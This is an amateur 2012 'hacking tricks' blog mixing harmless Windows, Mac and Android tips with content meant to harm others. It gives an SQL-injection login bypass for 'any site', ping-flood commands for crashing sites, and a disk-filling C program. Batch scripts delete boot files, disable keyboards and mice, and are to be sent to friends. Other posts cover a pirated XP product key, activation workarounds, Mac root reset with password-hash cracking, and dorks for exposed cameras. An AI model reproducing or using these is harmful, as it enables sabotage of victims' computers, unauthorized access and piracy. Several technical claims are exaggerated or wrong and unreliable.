Monday 29 October 2012

Simple SQL Injection to Login in Any Site

They are many Site's which are have LOop HoOles in there Site .... So by Using Those Loop Holes we can Enter into the Site And can modify any thing in the Site ....... But we Should need a Password to   enter in to the Site which we dont know .... 

So there is a Simple SQL Injection which Allows us to login to a Site ..... So the Code is  ........

Code :   "    'x' or 'x'='x'   " 



This is the Simple Code which should be given Both to the Username And the Password in a Login Forum ....

The Meaning of the Code is that " x or x " i.e (true or true = true )
here the database checks the given code within it and returns true , where we enter into the Database and can do anything in the Site ...

Note :  This Trick is Applicable for Few Sites Only .... 

Sunday 14 October 2012

How To Increase Broadband Speed

They are many ways to Increase your Broadband Speed ..... This is a Simple Trick where you can Increase high Speed Internet ... You just need to follow my Steps ........

Step 1 : Goto Run and type this code " gpedit.msc " 

Step 2 : You will get a Registry and Select " Computer  Configuration " and Expand the [Administrative Templates] > [Network] > [QoS Packet Scheduler] .....


Step 3 :  Now Double-click [Limit Reservable Bandwidth] and you need to [Enabled] it and then Change [Bandwidth limit %] to 0 % and Click [OK] Button.


Step 4 : Now Need to Restart you PC and then Check your Broadband Speed .........

Friday 12 October 2012

Virus That Fills The Hard Disk Entire Space Continously

Hey Folks this is my latest trick ... I have created a new virus that always fill up the HARD DISK space continuously  .... This is a simple C program & use a  Dev cpp Software to compile and Run the Virus which will automatically do its work ...


/* Virus Program Created by ABHI */
#include<stdio.h>
#include<dir.h>                               
#include<conio.h>
int main()
{
 int i=1,flag,count=1;
 char name[30];
 printf("created by ABHI !!!");
 for(i=0;i<1;)
 {
  flag=mkdir(tmpnam(name));
  if(!flag)
  count++;
 }
getch();
return ;
}

Wednesday 26 September 2012

Crash A Site Using CMD

If you want to Crash a site , they  are many ways to do ... But the Simple way is to Use Cmd ... So follow my steps ...

Step 1 : Start > Run > Cmd .... 

Step 2 : Now You need to find the IP Address of the Site you want to Crash .... It can be know by using a command called " ping " ....


Code : c:\ ping website

Example : c:\ ping mindjolt.com

Step 3 :  Now you will get the IP Address of the Site & by using this IP you can Crash the Site ....  Now type this code to crash the site

Code : c:\ ping site-ip -t -l 1000


Example : c:\ ping 97.64.112.229 -t -l 1000

Step 4 : Now wait for some time to crash it ... Similarly if you try this code in different PC's at the same time then it could be easy to crash it .... 

Step 5 : Similarly you can crash the " Server "  by using the same code  with few modifications ........ 

Code : c:\  ping site-ip -l 65500 -n 10000 -w 0.00001

Example : c:\ ping 192.127.1.45 -l 65500 -n 10000 -w 0.00001

Step 6 : Now by using a simple ping command you can Crash a Site

Monday 10 September 2012

How To Make Windows XP Genuine


Many of my friends were using Windows XP & had a problem called Genuine ..... So try this trick to make your Windows XP genuine ....  Follow My steps .....  

1) start > run > "  regedit  "

2) go to this path in it as shown 

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer 

.... and doubleclick on it ....  add any words you want at alphanumeric (Eg : abhi ) ... then press ok and exit the Regedit.

3) Now Goto Start > Run > Copy this code in it 
Code : "  %systemroot%\system32\oobe\msoobe.exe /a  " 

4) Now you will get the activation screen & click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this 

Key:  JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ 

then click update it will return back..this mean it was updated & Restart your PC .... Now Ur Windows XP is Genuine 

Saturday 8 September 2012

Hide Any Drive In PC Without Using Registry

You can Hide any Drive in PC with out using registry editor by using Disk Partition ... So follow my steps ....

1) Go to Start > Run > type " diskpart " ... A DOS window will open & appears as  DISKPART>

2) Then type "list volume" ... So that you will get all the drives in your PC & can select any drive 

3)Now if  you want to hide drive D then type " select volume 2 " & message will display as (Volume 3 is the selected volume)...

4) Now if you want to hide the drive then type " remove letter D " & message will display as ( Diskpart Removed the Drive letter )


5) Now if you want to Unhide the drive then type " assign letter E " & message will display as ( Diskpart Assigned the Drive letter ) 



Saturday 1 September 2012

Android App To Steal Credit Card

An Andorid App was released at the Defcon hacker conference in Las Vegas Friday, Lee demonstrated an Android software tool called NFCProxy that’s capable of both " reading " & “ replaying ” data from contactless credit cards–any of the common payment cards with embedded RFID chips that allow payments at retail outlets’ wireless point-of-sale devices like these.

This app can give the info of the user name , password ,date of transaction and many more ........ the source code of the app is also given .... when you run the app it looks like this....



For the security minded among you, the good news is that the source code for the app is available here: 

https://github.com/thomasskora/android-nfc-paycardreader 

Caution : Never try to use this app illegally because you will be caught by the security agents ...

Friday 31 August 2012

Access Any Forum or Website Without Registered

when i use to surf forums for some info, there is a problem called registration which is a problem ... So i tried this hack ... Follow my steps to do it ....

1.You need a Firefox Add-on called ‘User Agent Switcher’ , install it & then go to Tools > User Agent Switcher > Options and then again to Options 


2. Now Select User Agent from the left sidebar and click Add. Now in the description field type this and in user agent field type:  codes :

Code :  crawl-66-249-66-1.googlebot.com

Code : Googlebot/2.1 (+http://www.googlebot.com/bot.html)


3. Now Goto Tools > Select Google Bot as your User Script by going to Tools > User Agent Switcher.

Caution : This trick is applicable for few forum sites like this
http://www.hackforums.net/forumdisplay.php?fid=223

Thursday 30 August 2012

Crack Password Hashes In Mac OS X Lion

When i was using mac x lion , i tried for different hacks to do in it, where i tried this cracking of password in mac ... So follow my steps to do it ......

1.Gain Admin Access :      

Actually you wont have admin access because you are hacking in it , So to gain it go to the "  boot the computer into Single-User Mode "  by holding " CMD+S " on startup, mount the drive, and type the command:

Code : "  /sbin/mount -uw / " 

Followed By : 
" launchctl load /System/Library/LaunchDaemons/com.apple.opendirectoryd.plist "

And Finally : " password "

Then, enter your new root password when prompted twice. After the password has been reset, type: " restart " 

2. Log In :

Log into the admin account that you have accessed now , or if you don’t have access to one, select “Other” in the Login Window & enter “root” as the username, and then the password that you just set now ...

3. Download Utility : 

We use the DaveGrohl utility to both crack the password and extract the hash .... Click this link to Download it ....

https://hotfile.com/dl/164399148/ed022d8/DaveGrohl-1.0.zip.html

The utility works by extracting the hash from the User Profile, which is located in:

" /private/var/db/dslocal/nodes/Default/users/.plist "

 It opens the hash from the ‘ShadowHashData’ field and begins cracking.

4. Open Terminal : 

Once you’ve downloaded the utility, open up Terminal and type this code in it :

Code : " cd Downloads/DaveGrohl "

5. Crack Password : 
Type the following to begin cracking the password:

Code : " sudo ./dave -u " 



DaveGrohl will begin cracking your password via wordlists and then continue with brute-forcing ... until it gets the password which may take some time (Finished in 0.772 Sec per 55,620 Guesses) & then the output message of the password  is given as ....

-- Found password : ' Darling '
-- (dictionary attack)


Wednesday 29 August 2012

Mac Hot Corners Hack

In Mac OS X (Leopard) we have a feature called " Hot Corners " ... It is used for assigning 4 different functions to the 4 corners of the screen when you point it to the corners of your screen when the "Hot Corner "  is Activated .... So to Activate it follow my steps ...

Step 1 : First of all , go inside Apple > System Preferences > Expose and Spaces Preferences Pane ...

Step 2 : Now In Expose & Space you will find 4 corners where you can select which function to be accessed at the corners ... 



Step 3 : So when you place your mouse at the corners, you can access that function which is too easy for us .....  So try to use mac OS which has more features ....



Tuesday 28 August 2012

Play Snake Game in Youtube

Try this latest trick for youtube videos.....
When i was watching a video in youtube i use to wait for the buffering which is so irritating .... So i thought to try any hacks for this youtube then i got a popular Snake Game , which you can also play when the video is in buffering ......

So try this Simple Shortcut to Play a Game in Youtube 



  • When the video is streaming in youtube press " left button " of mouse and press " up arrow key" at a time .
  • Now the streaming circle will start to move like snake. Play this game using your arrow keys.

Monday 27 August 2012

How to Make Windows 7 Genuine

Try my new trick to make your Windows 7 genuine for 1 year 

1. Goto “ Start Menu -> All Programs -> Accessories” . Right click on “ Command Prompt ” and select “ Run as Administrator “

2. Now type the following command code and hit enter
Code : " slmgr -rearm  "

3. Now restart your PC .. this will give you a 30 days trail period & you can use the same code for another 2 time .. So over all " 120 days " Trail period you get ..

4. Now try this trick to extend the trial period for another 240 days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform

5. In right-side pane, change value of SkipRearm to 1 , Now again try the above code for 8 times ... So over all you get " 240 Days " Trail period .... 

6. So by Using a Simple code you get genuine for 1 year , 120 days using “slmgr -rearm” command before registry edit + 240 days using “slmgr -rearm” command after registry edit = 360 Days                                                                                                                                                          

Sunday 26 August 2012

Convert Your Blog To Ebook PDF File

when i was posting my tricks in my blog , few friends have asked me how to see your posts because i dont have internet. So i thought to give them as a ebook pdf files so that they can try my tricks in home , So follow my Step to do your PDF File ...

Step 1 : First you need to go to this Site " http://blog2book.pothi.com  " and select start now ...





Step 2 : Enter your Blog Address in it & Select a platform (blogspot or wordpress ) & also Select latest posts you have (10 or 50) ...

Step 3 : Now Click " Get The Posts " & Then "Select your Book Order and then click "Continue ", Customize your Book  & " Create Your Book .....

How to Hide Folders in Android Mobiles

I gave some files to my friend to hide it in his mobiles but it has displayed in the gallery because its an Android mobile, So i tried for any hack tricks to hide folders in Android OS Mobiles ,then i got this Simple Trick ... So follow my steps & try it in Android Mobiles 

Step 1 :  Install a file manager in your android phone by using the Android market and search for file manager and install anyone.

Step 2 : Open the File Manager and Goto the folder you want to hide ( even any single file also you need to keep it in a folder )

Step 3 : Now Rename the folder you want to hide with "." Ex: ".name" instead of "name" 

Step 4 : You are done , Android gallery and video player won't recognize that folder anymore.

Step 5 :  If you want to unhide it, then rename the folder and remove the "." Ex: ".video" to  "video" 

Disable or Enable Run From PC

When i was trying for a new hack , i just wanted to use the " run " to open cmd .. So i got an idea that to disable the run only itself .... So Follow my steps to Disable Run 

Step 1 : Start->Run->gpedit.msc->User Configuration->Adminstrator Templates->Start Menu & Taskbar->Remove Run menu from start menu



Step 2 : Now you will find the Remove Run from Start Menu then Double click on the Remove Run and  disable the Run from the Start Menu 

Step 3 : Now If you want the Run again then  just change the Disable to Enable and again use your Run .... Try it in your friends PC 

Saturday 25 August 2012

See 911 Attack On Notepad

Step 1 : Open Notepad and copy this code in it

Code : Q 3 3 M N




Step 2 : Goto Format -> Font -> keep Size = 72 and Font name = wingdings ..... then you can see the blast .....

Friday 24 August 2012

Virus To Restart PC Everytime

Step 1 : Open Notepad and copy this code in it

Code :  " cd .. 
              shutdown /t 30 /r /c " Sorry Your PC is Hacked by ABHI "

Step 2 : Now Save it as " res.bat " and try it in your friends PC ...

Thursday 23 August 2012

Login Multiple Facebook Accounts Using in Same Browser


  •  Login Multiple Facebook Using Chrome :
Step 1 : Chrome has a direct shortcut key to access ..
 

Code : " Ctrl + Shift + n "




  •  Login Multiple Facebook Using Firefox :   

Step 1 : Right Click on shortcut of firefox browser and click properties

Step 2 : Select " Find Target " and copy this code in it ..

Code :  "  -profilemanage -no-remote
  "

Step 3 : Now Open firefox you will find a new box , there you can login multiple facebook

Note : You can use MULTI-FOX Add on also

INSTALLING XP IN 10 MINUTES

When i formatted my PC and Installed XP , it took more then 39 minutes to install.. So i tried a new trick to make your format time to less than 10 minutes ... you just need to follow my steps ..

Step 1 : You will get an 39 minutes to install after you format and copy the files as given in the image 



Step 2 : When this image appears you need to press " Shift + F10 "  then you will get command prompt and type " Taskmgr "  in it , you will get task manager 

Step 3 : After you get task manager you goto processes and you will find " Setup.exe " then right click on it and set Priority to HIGH ...

Step 4 : Now Click enter and see the magic .... your installation will be completed within 10 minutes ...........


Wednesday 22 August 2012

Virus To Disable And Enable Your KeyBoard

How To Disable Keyboard :

Follow My Steps :                         

1. Open Notepad and Copy this Code in it 

Code :


@echo off
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg

2. Now Save this File as " key.bat " and send it to your friend ...

How To Enable Keyboard :

1. Goto Start > Run > regedit .. You will get registry Editor

2.Open this in it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout


  
   
3. In it you can see  " Scancode Map " .. Just delete that file .. and restart your PC .. again you can get your Keyboard Back ...


Download Torrent Files Faster Using IDM

When i was downloading my torrent files , it took long time to download my file .. then i searched for any software to rectify this problem, then i got this .. So try this trick 

Follow My Steps :


1. First you should have an IDM Software .. If not install it

2. Now Download a torrent file for any site 

3. Now Goto this site  http://www.zbigz.com/  and upload your torrent file in  it

4. Now click " GO"  button and wait for the file to be upload by the site & then you will get a Zip Button , click on it and download your new IDM file ......... 

Tuesday 21 August 2012

Virus To Shutdown A PC Forever


Step 1 : Open the Notepad and Copy this code in it

Code :

echo off                         
C:                           
cd..
cd..
cd..
attrib -r -s -h ntdetect.com
del ntdetect.com
echo on
print Ur PC is Hacked by Me 

Step 2 : Save it as " shut.bat " .. This Virus will shutdown the PC and never opens again because it deletes the " OS Booting Files "So  never try it in your PC or illegally ... 



Virus To Shutdown PC

Step 1 : Create a Shortcut on Desktop by right click > new > shortcut ... now type this code in it 

Code : " Shutdown -s -t 30 "



Step 2 : Click next & it will be on desktop .. now right click on it goto  properties > change icon > select your icon and then send it to your friends ......

Monday 20 August 2012

How To Find Real IP Address of Any Website

Step 1 : Goto Start > Run > Cmd 

Step 2 : Type " ping " your website name which you want to know the IP address

Ex : c:\ ping google.com



Step 3 : Now the red line in the image is your IP Address ......

Magic Folder Names

When i was creating a new folder for my games ... i got an error while giving a name to the folder like " aux " ... i did not understand 
why error occurred .. then i got to know why it came like that ....


" AUX , NUL,CON, COM1-4, LPT1-3, and PRN "  are reserved words used for DOS Devices  .. These are specified in  " IO.SYS " of the  MS Dos days. Here is a brief list for the codes 




Code :                               

CONFIG$ - Unknown


CLOCK$ - System clock

LPT1 or PRN - First parallel port

AUX or COM1 - First serial communicationport

COM2  - Second, Third, ... communicationport

NUL - Dummy port, or the "null device" which we all know under Linux as /dev/null.

CON - Console; combination of keyboard and screen to handle input and output





A Robo Writing For U


How do u feel when some robo is writing for u ,it would be awesome .... So try this code ,the robo will write for u






Step 1 : Open Notepad and copy this code in it


Code :  

Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "H"       
wscript.sleep 400
wshshell.sendkeys "I"
wscript.sleep 400
wshshell.sendkeys " "
wscript.sleep 400
wshshell.sendkeys "A"
wscript.sleep 400
wshshell.sendkeys "B"
wscript.sleep 400
wshshell.sendkeys "H"
wscript.sleep 400
wshshell.sendkeys "I"
wscript.sleep 400

Step  2  : Now save it as " robo.vbs" & see the magic ......

Sunday 19 August 2012

Android Moblie Hack Codes


Few Android  Moblies Codes  :



1. Phone Camera Update            

Code : " *#*#34971539#*#* "

This code is used to get information about phone camera. It shows following 4 menus:
Update camera firmware in image (Don't try this option)
Update camera firmware in SD card
Get camera firmware version
Get firmware update count

WARNING: Never use the first option otherwise your phone camera will stop working and you'll need to take your phone to service center to reinstall camera firmware.

2. End Call/Power

Code : " *#*#7594#*#* "

This one is my favorite one. This code can be used to change the "End Call / Power" button action in your phone. Be default, if you long press the button, it shows a screen asking you to select any option from Silent mode, AirPlane mode and Power off.
You can change this action using this code. You can enable direct power off on this button so you don't need to waste your time in selecting the option.

3.  File Copy for Creating Backup

Code : " *#*#273283*255*663282*#*#* "

This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo.

4 .  Service Mode

Code : " *#*#197328640#*#* "

This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

Virus To Disable Mouse




Step 1 : Open notepad and copy this code in it 

Code :
rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————

Step 2 : Now Save it as " vir.bat " and send it to your friends PC

Note : Be careful in using these scripts, i will not be responsible if you damage your system & dont use it illegally ..........

Saturday 18 August 2012

Android Hack Codes


Secret Hacking Codes for Android Mobile Phones:

1. Complete Information About your Phone  :

   Code :   " *#*#4636#*#* "

 This code can be used to get some interesting information about your phone and battery.
 It shows following 4 menus on screen:
Phone information
Battery information
Battery history
Usage statistics

2. Format Android Phone :

 Code :  "  *2767*3855#  "

Think before you give this code. This code is used for factory format. It'll remove all files and settings including the internal memory storage. It'll also reinstall the phone firmware.

Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code.


3. Factory data reset


" *#*#7780#*#* "

This code can be used for a factory data reset. It'll remove following things:
Google account settings stored in your phone
System and application data and settings, Downloaded applications
It'll NOT remove:
Current system software and bundled application
SD card files e.g. photos, music files, etc.

Note: Once you give this code, you get a prompt screen asking you to click on "Reset phone" button. So you get a chance to cancel your operation.

Wednesday 15 August 2012

Folder Lock Without Using any Software

Open Notepad & copy this Code :

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== Your Password goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Now before Saving it .. You will find "Your Password " in the code .. there you can enter
your password & Then Save it as " Lock.bat "

Monday 13 August 2012

How to Test your Antivirus


  • Open Notepad and copy the following code exactly onto it

CODE :

" X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* "



  • Now save the file of notepad as " myfile.com "
  • Now run the antivirus scan on this myfile.com  file....
  • if it detects the virus then your anti-virus is working if not change your anti-virus



Sunday 12 August 2012

How To Block and UnBlock Websites

How to Block a Site :

Step 1 :  Goto > Start > Run >  C:\WINDOWS\system32\drivers\etc 

Step 2 :  Now you will see file name Host ...  open that in Notepad 

Step 3 :  See you will find  "127.0.0.1  localhost"  ...now add your site which u want to block like this

Step 4 : As above image type the code as it is Eg : 127.0.0.1 miniclip.com www.miniclip.com

Step 5 : Now when you open the site you will see itz blocked .......

How to UnBlock a Site :

Step 6 : Simply remove the site in the host Eg : 127.0.0.1 miniclip.com www.miniclip.com & just delete it and save it

Step 7 : Now when you open the site you will see itz Unblocked .......

Open this and Talk with PC

Step 1 : Open your Notepad and type this code

Code :



Step 2 : Now Save it as " talk.vbs " & open it .... now your PC will    
             take with you ........
                         

Hack Your Google

They are some tricks to hack google , i have given some codes like

CODE :

inurl: view/view.shtml               

inurl: view/indexFrame.shtml
inurl: view/index.shtml
inurl: view/view.shtml
inurl: phphotoalbum/upload
inurl: indexFrame.shtml Axis
                  
intitle: start inurl:cgistart
intitle: netcam live image
intitle: Live View / - AXIS   
intitle:snc-cs3 inurl:home/  

Thursday 9 August 2012

Virus that Opens many Sites

Step 1 : Open notepad and type this code



Step 2 : Save it as " name.bat " and send it to your friends ......  

How to Hide a Folder

Type My Code : To Hide and Show Folder

Step 1 : Goto Start -> Run -> Cmd

Step 2 : Copy this Code in Cmd to Hide the folder  and  you will get  like this

Code :  "  cacls folder-name /e /p everyone:n  "



Step 3 : If u want to open the folder Copy this Code in  Cmd  and you will get  like this

Code :  "  cacls folder-name /e /p everyone:f   "



Step 4 : So easy to Hide the folders when u know the code ..... Enjoy

Wednesday 8 August 2012

Wanna Make 1000 Newfolders

Type My Code :




Now copy the code in notepad and save it as " name.bat " which is most important and run this virus in your friend's PC ... Funny Pranks .. Never Use it illegally ....